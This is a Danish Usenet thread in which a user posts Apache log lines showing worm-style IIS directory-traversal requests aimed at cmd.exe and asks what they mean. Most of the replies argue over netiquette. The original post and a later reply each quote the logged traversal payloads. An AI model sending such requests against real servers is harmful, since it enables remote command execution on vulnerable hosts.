---

hej ng.
Dette er taget fra min acces_log på min apache server.
Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
kommandoer af, men er det mig der tager fejl - eller hvad?

62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 329
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/scripts/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/IISADMPWD/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/msadc/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/_vti_bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:46 +0100] "GET /default.asp+.htr
HTTP/1.0" 404 286


Håber i kan hjælpe

/Kasper

---

Kasper <knl@oncable.dk> wrote:
> hej ng.
> Dette er taget fra min acces_log på min apache server.
> Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
> kommandoer af, men er det mig der tager fejl - eller hvad?

Flot. Du har stillet det samme spoergsmaal her og i UNIX gruppen --
endda uden at cross-poste, og i din arrogance antager du at *ingen* andre
nogensinde har stillet samme spoergsmaal. Hvis du brugte 4 sekunder paa
Google kunne du have besvaret dit spoergsmaal uden at bruge vores tid,
og uden at vente paa vores svar.

Du har saa meget teknologi til din raadighed. Laer for guds skyld at
bruge den.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

---

On Fri, 27 Dec 2002 20:02:09 +0000, Alex Holst <a@mongers.org> wrote:

>Kasper <knl@oncable.dk> wrote:
>> hej ng.
>> Dette er taget fra min acces_log på min apache server.
>> Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
>> kommandoer af, men er det mig der tager fejl - eller hvad?
>
>Flot. Du har stillet det samme spoergsmaal her og i UNIX gruppen --
>endda uden at cross-poste, og i din arrogance antager du at *ingen* andre
>nogensinde har stillet samme spoergsmaal. Hvis du brugte 4 sekunder paa
>Google kunne du have besvaret dit spoergsmaal uden at bruge vores tid,
>og uden at vente paa vores svar.
Tak for dit hurtige og venlige svar, det var lige noget jeg kunne
bruge :)
>
>Du har saa meget teknologi til din raadighed. Laer for guds skyld at
>bruge den.

---

"Alex Holst" <a@mongers.org> wrote in message
news:17oud-tjb.ln1@miracle.mongers.org...

<SNIP>

> Hvis du brugte 4 sekunder paa
> Google kunne du have besvaret dit spoergsmaal uden at bruge vores tid,
> og uden at vente paa vores svar.

<SNIP>

Han har vel kun brugt af din tid, hvis du svare på spørgsmålet. Så hvis du
ikke
ønsker at bruge tid på ham, så kan du jo bare lade være med at svare. Hvis
de
få sekunder det tager at læse spørgsmålet kan irritere dig, så må du
virkelig
være en travl mand.

---

SpookiePower <boxjunk2600@hotmail.com> wrote:
> "Alex Holst" <a@mongers.org> wrote in message
>> Hvis du brugte 4 sekunder paa Google kunne du have besvaret dit
>> spoergsmaal uden at bruge vores tid, og uden at vente paa vores svar.
>
> Han har vel kun brugt af din tid, hvis du svare på spørgsmålet. Så
> hvis du ikke ønsker at bruge tid på ham, så kan du jo bare lade være
> med at svare. Hvis de få sekunder det tager at læse spørgsmålet kan
> irritere dig, så må du virkelig være en travl mand.

Forkert holdning. Lad mig citere fra phk's Building a Bikeshed:

I wish we could reduce the amount of noise in our lists and I wish
we could let people build a bike shed every so often, and I don't
really care what colour they paint it.

The first of these wishes is about being civil, sensitive and
intelligent in our use of email.

If I could concisely and precisely define a set of criteria for
when one should and when one should not reply to an email so that
everybody would agree and abide by it, I would be a happy man, but
I am too wise to even attempt that.

But let me suggest a few pop-up windows I would like to see
mail-programs implement whenever people send or reply to email
to the lists they want me to subscribe to:

+------------------------------------------------------------+
| Your email is about to be sent to several hundred thousand |
| people, who will have to spend at least 10 seconds reading |
| it before they can decide if it is interesting. At least |
| two man-weeks will be spent reading your email. Many of |
| the recipients will have to pay to download your email. |
| |
| Are you absolutely sure that your email is of sufficient |
| importance to bother all these people ? |
| |
| [YES] [REVISE] [CANCEL] |
+------------------------------------------------------------+

Hvis disse latterlige spoergsmaal, hvor svaret allerede er frit
tilgaengeligt, tillades ender vi med 100 indlaeg om dagen der stiller de
samme spoergsmaal igen og igen, og vi kommer ikke videre. Niveauet i
gruppen er lavt nok i forvejen. Tillad mig at citere fra esr's Smart
Questions:

On Not Reacting Like A Loser

Odds are you'll screw up a few times on hacker community forums
- in ways detailed in this article, or similar. And you'll be
told exactly how you screwed up, possibly with colourful asides.
In public.

When this happens, the worst thing you can do is whine about the
experience, claim to have been verbally assaulted, demand
apologies, scream, hold your breath, threaten lawsuits, complain
to people's employers, leave the toilet seat up, etc.
Instead, here's what you do:

Get over it. It's normal. In fact, it's healthy and appropriate.

Community standards do not maintain themselves: They're
maintained by people actively applying them, visibly, in public.


Alternativet til mine protester over det lave niveau er at de dygtige
folk forsvinder fra gruppen. Jeg goer hvert fald paa et tidspunkt. Hvis
du engang kommer ud i den rigtige verden vil du en dag forstaa hvorfor
det ikke nytter noget at loese det samme problem igen og igen. Se mod
fremtiden.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

---

On Fri, 27 Dec 2002 21:34:30 +0000, Alex Holst <a@mongers.org> wrote:

>SpookiePower <boxjunk2600@hotmail.com> wrote:
>> "Alex Holst" <a@mongers.org> wrote in message

Snit alot a littlebit

Alex, ikke for at fornærme dig, men du laver faktisk mere støj en de
få "dumme" som du ikke bryder dig om.

>Alternativet til mine protester over det lave niveau er at de dygtige
>folk forsvinder fra gruppen. Jeg goer hvert fald paa et tidspunkt. Hvis
>du engang kommer ud i den rigtige verden vil du en dag forstaa hvorfor
>det ikke nytter noget at loese det samme problem igen og igen. Se mod
>fremtiden.

Hvad skal alle de kloge mennesker dog hjælpe hinanden med, vil du ikke
mene at der skal være plads til alle, vi kan jo ikke være elite
allesammen og Alex vi ved godt du er den største, så bær dog over med
os dumme, eller hvis du mener at der er støj som ikke hørere hjemme
her så brug dog abuse.

Palle Larsen.

---

"P.L" wrote:
>
> On Fri, 27 Dec 2002 21:34:30 +0000, Alex Holst <a@mongers.org> wrote:
>
> >SpookiePower <boxjunk2600@hotmail.com> wrote:
> >> "Alex Holst" <a@mongers.org> wrote in message
>
> Snit alot a littlebit
>
> Alex, ikke for at fornærme dig, men du laver faktisk mere støj en de
> få "dumme" som du ikke bryder dig om.

Jeg synes det er på tide Alex får noget opbakning. Alex har fuldstændig
ret i, at spørgsmålet aldrig burde være stillet. At man så kunne have
påpeget det på en mere venlig måde, er en anden sag. Jeg har fuld
forståelse for, at det kan være svært at give et venligt svar, hver
eneste gang det same spørgsmål bliver stillet.

Og P.L alt den støj du snakker om begyndte faktisk først, da der blev
stillet spørgsmålstegn ved Alex udtalelser. Hvis Alexs indlæg havde
fået lov at stå uimodsagt, ville der have været mindre støj.

Jeg har ikke kigget efter, om det konkrete spørgsmål er besvaret i FAQ.
Men så ofte som det bliver stillet, burde det være tilfældet.

Men uanset om det står i denne gruppes FAQ eller ej kan man utvivlsomt
ved en søgning på google eller en anden søgemaskine hurtigt finde ud
af, at spørgsmålet er stillet mange gange.

Det kan være, at hvis man faktisk har gør sig den umage, at søge efter
svaret, vil det blot vise sig at spørgsmålet er blevet stillet mange
gange uden at blive besvaret. I så fald kan man måske bedre tillade
sig at spørge, men man bør først spørge sig selv, om det er umagen
værd. Hvad er chancen for, at spørgsmålet bliver besvaret den her gang?

Hvis man allerede har gjort en indsats for at lede efter svaret, og
først derefter spørger. Så bør det nævnes, da nogle af de oplysninger
man trods alt har fundet kan være af relevans.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
for(_=52;_;(_%5)||(_/=5),(_%5)&&(_-=2))putchar(_);

---

On Sat, 28 Dec 2002 14:56:14 +0100, Kasper Dupont
<kasperd@daimi.au.dk> wrote:



>Det kan være, at hvis man faktisk har gør sig den umage, at søge efter
>svaret, vil det blot vise sig at spørgsmålet er blevet stillet mange
>gange uden at blive besvaret. I så fald kan man måske bedre tillade
>sig at spørge, men man bør først spørge sig selv, om det er umagen
>værd. Hvad er chancen for, at spørgsmålet bliver besvaret den her gang?

Kasper, det ved både du Alex og jeg samt en hel del flere, men har I
aldrig været nye, der sidder rent faktisk folk der er HELT nye udi i
dette, IKKE alle er startet med "fido" og 300baud, så det korte af det
lange, kan man ikke sige det pænt eller hjælpe på en sober måde, så
skal man holde mund, eller oprette en modereret nyhedgruppe, som kun
er for nørder.

Og husk lige på IKKE alle folk er lige fikse til det med computer.

---

"P.L" <PL@notanemail.nn> skrev i en meddelelse
news:qkhr0vka5a6onhjuqijb142dqtav3rkuks@4ax.com...
> On Sat, 28 Dec 2002 14:56:14 +0100, Kasper Dupont
> <kasperd@daimi.au.dk> wrote:
>
>
>
> >Det kan være, at hvis man faktisk har gør sig den umage, at søge efter
> >svaret, vil det blot vise sig at spørgsmålet er blevet stillet mange
> >gange uden at blive besvaret. I så fald kan man måske bedre tillade
> >sig at spørge, men man bør først spørge sig selv, om det er umagen
> >værd. Hvad er chancen for, at spørgsmålet bliver besvaret den her gang?
>
> Kasper, det ved både du Alex og jeg samt en hel del flere, men har I
> aldrig været nye, der sidder rent faktisk folk der er HELT nye udi i
> dette, IKKE alle er startet med "fido" og 300baud, så det korte af det
> lange, kan man ikke sige det pænt eller hjælpe på en sober måde, så
> skal man holde mund, eller oprette en modereret nyhedgruppe, som kun
> er for nørder.
>
> Og husk lige på IKKE alle folk er lige fikse til det med computer.
>

Hørt.
Bare fordi man ved noget gør ikke man er klogere end andre.

VH, Regards
BB
Copenhagen


*Remove NOSPAM in my mail address for personal mail.*
Norton AntiVirus is sending my email.

---

"BB" <BB@tdcnospamadsl.dk> wrote in news:3e0ddefa$0$47405
$edfadb0f@dtext01.news.tele.dk:

> Bare fordi man ved noget gør ikke man er klogere end andre.

Skægt, jeg troede eller det var _præcis_ sådan det hang sammen.

--
Knud

---

P.L <PL@notanemail.nn> wrote:
> Alex, ikke for at fornærme dig, men du laver faktisk mere støj en de
> få "dumme" som du ikke bryder dig om.

Hvordan kommer du frem til det resultat? 'ikke for klog' traaden er
indtil videre paa over 30 indlaeg, udelukkende fordi vedkommende ikke
kunne formulere et klart spoergsmaal og tog. Der har tidligere vaeret
traade af samme natur som blev meget stoerre. Denne traad koerer baade i
sikkerhed og UNIX gruppen, uden cross-posting. I UNIX gruppen har den
udviklet sig til lidt gaetterier fra forskellige mennesker paa hvad
loggen skyldes, hvilken orm der virker paa den maade, etc.

Ville det ikke vaere bedre hvis vedkommende pastede een linie fra sin
log ind i Google og fik svaret med det samme, i stedet for at alle disse
mennesker kommer med deres mere eller mindre korrekt beskrivelser af
symtomet.

> Hvad skal alle de kloge mennesker dog hjælpe hinanden med, vil du ikke
> mene at der skal være plads til alle, vi kan jo ikke være elite
> allesammen og Alex vi ved godt du er den største, så bær dog over med
> os dumme, eller hvis du mener at der er støj som ikke hørere hjemme
> her så brug dog abuse.

Foerst og fremmest handler dette ikke om mig. Jeg ved ikke hvorfor det
punkt er saa svaert at forstaa. Sagens kerne er, at der bliver stillet
forslag til hvordan man kan hjaelpe sig selv til at finde den
information man har brug for. I stedet for at foelge disse raad,
begynder folk at brokke sig over at der ikke er nogen med tilstraekkelig
kompetence der vil made dem (og de 100 andre der stiller det samme
spoergsmaal) med information.

Dette er faktisk et diskussionsforum, ikke et hjaelpeforum. Vis respekt
over for skribenterne i gruppen ved at selv forsoege at loese dit
problem, og *derefter* bede om hjaelp.

Der er intet i vejen med uvidenhed som saadan. Man skal starte et sted,
men ikke paa bekostning af alle andre i naerheden.

Hvis du er uenig i dette vil jeg spoerge dig hver gang jeg har problemer
med mit statisk analyse projekt. Og hver gang nogen spoerger mig om
OpenSSH, Apache eller CVS, sender jeg dem videre til dig. Det samme vil
jeg goere naar spoergsmaalet handler om udvikling af sikre programmer.
Jeg ved godt, at svarene paa alt relateret til disse emner findes paa
nettet, men det handler jo om at hjaelpe hinanden.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

---

On Sat, 28 Dec 2002 14:17:57 +0000, Alex Holst <a@mongers.org> wrote:

>P.L <PL@notanemail.nn> wrote:
>> Alex, ikke for at fornærme dig, men du laver faktisk mere støj en de
>> få "dumme" som du ikke bryder dig om.
>
>Hvordan kommer du frem til det resultat? 'ikke for klog' traaden er
>indtil videre paa over 30 indlaeg, udelukkende fordi vedkommende ikke
>kunne formulere et klart spoergsmaal og tog. Der har tidligere vaeret
>traade af samme natur som blev meget stoerre. Denne traad koerer baade i
>sikkerhed og UNIX gruppen, uden cross-posting. I UNIX gruppen har den
>udviklet sig til lidt gaetterier fra forskellige mennesker paa hvad
>loggen skyldes, hvilken orm der virker paa den maade, etc.

Alex, cool down, jeg ved godt det kan virke træls, men der er stadig
mange alm. mennesker der uder der ikke fatter en dyt af dette net
halløj, og de stille "dumme spørgsmål" men er det de samme
personer/spørgsmål hvorfor så ikke overse dem eller putte dem i dit
filter, Alex pas på blodtrykket ;).

>
>Ville det ikke vaere bedre hvis vedkommende pastede een linie fra sin
>log ind i Google og fik svaret med det samme, i stedet for at alle disse
>mennesker kommer med deres mere eller mindre korrekt beskrivelser af
>symtomet.

Jo, helt enig, men folk skal jo kende google for at kunne bruge den,
og tro mig der er mange begyndere derude som ikke kan finde ud af at
bruge en søgemaskine, og der kommer flere til hver dag :/

>
>> Hvad skal alle de kloge mennesker dog hjælpe hinanden med, vil du ikke
>> mene at der skal være plads til alle, vi kan jo ikke være elite
>> allesammen og Alex vi ved godt du er den største, så bær dog over med
>> os dumme, eller hvis du mener at der er støj som ikke hørere hjemme
>> her så brug dog abuse.
>
>Foerst og fremmest handler dette ikke om mig. Jeg ved ikke hvorfor det
>punkt er saa svaert at forstaa.

Hmmm :).

>Sagens kerne er, at der bliver stillet
>forslag til hvordan man kan hjaelpe sig selv til at finde den
>information man har brug for. I stedet for at foelge disse raad,
>begynder folk at brokke sig over at der ikke er nogen med tilstraekkelig
>kompetence der vil made dem (og de 100 andre der stiller det samme
>spoergsmaal) med information.

Det største problem med NG's er:
Det skulle være ligesom fido, det første man får fra sin feed er et
brev med regler samt en lille "how to google", det ville stoppe en
del, men sådan er det ikke, og de mange hjemme/supportsider der bruger
usenet i en slags chatforum ala kandu gør det jo heller ikke bedre.


>
>Der er intet i vejen med uvidenhed som saadan. Man skal starte et sted,
>men ikke paa bekostning af alle andre i naerheden.

Øhhhhh, hvordan kommer den uvidende videre uden at spørge???, har du
aldrig stillet spørgsmål som senere kunne virke lidt dumme, hvis ikke
er du en af en meget lille flok, jeg ville også gerne være perfekt,
men er det desværre ikke helt, kun 99% ;)

>
>Hvis du er uenig i dette vil jeg spoerge dig hver gang jeg har problemer
>med mit statisk analyse projekt. Og hver gang nogen spoerger mig om
>OpenSSH, Apache eller CVS, sender jeg dem videre til dig. Det samme vil
>jeg goere naar spoergsmaalet handler om udvikling af sikre programmer.
>Jeg ved godt, at svarene paa alt relateret til disse emner findes paa
>nettet, men det handler jo om at hjaelpe hinanden.

Lige nøjagtigt, men nu er sagen at jeg ikke ved en dyt om det topics,
så jeg vile blive nødt til at stille dem videre herinde ;))

Lad denne tråd vile i fred, der er dog jul og et nyt år står for
døren, lad os håbe at færre fjolser vil blive født 8)), Alex give
peace a chance!

P.Larsen.

---

On Fri, 27 Dec 2002 22:07:51 +0100, "SpookiePower"
<boxjunk2600@hotmail.com> wrote:


>Han har vel kun brugt af din tid, hvis du svare på spørgsmålet. Så hvis du
>ikke
>ønsker at bruge tid på ham, så kan du jo bare lade være med at svare. Hvis
>de
>få sekunder det tager at læse spørgsmålet kan irritere dig, så må du
>virkelig
>være en travl mand.

Alex, er som Alex altid har været, selv på Amiga var/er han en uvenlig
mand., der ikke lader en begynder slippe fra sammenstødet, uden at ha'
trynet ham verbalt.

My2cent

---

Den får jeg også, BÅDE i min acces.log og i min error.log og ja, det er et
angreb som IIS er meget sårbar overfor sådan at du med et par kommandoer
burde kunne ligge hele IIS ned....
Men det betyder intet på din apache (så vidt jeg ved)....

Mvh Sophus..

"Kasper" <knl@oncable.dk> wrote in message
news:cjbp0voo3j2v5n79m52s37g82aqug159ne@4ax.com...
> hej ng.
> Dette er taget fra min acces_log på min apache server.
> Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
> kommandoer af, men er det mig der tager fejl - eller hvad?
>
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
> /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/scripts/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/wi
nnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/IISADMPWD/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/
winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/msadc/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winn
t/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/wi
nnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/_vti_bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/w
innt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:46 +0100] "GET /default.asp+.htr
> HTTP/1.0" 404 286
>
>
> Håber i kan hjælpe
>
> /Kasper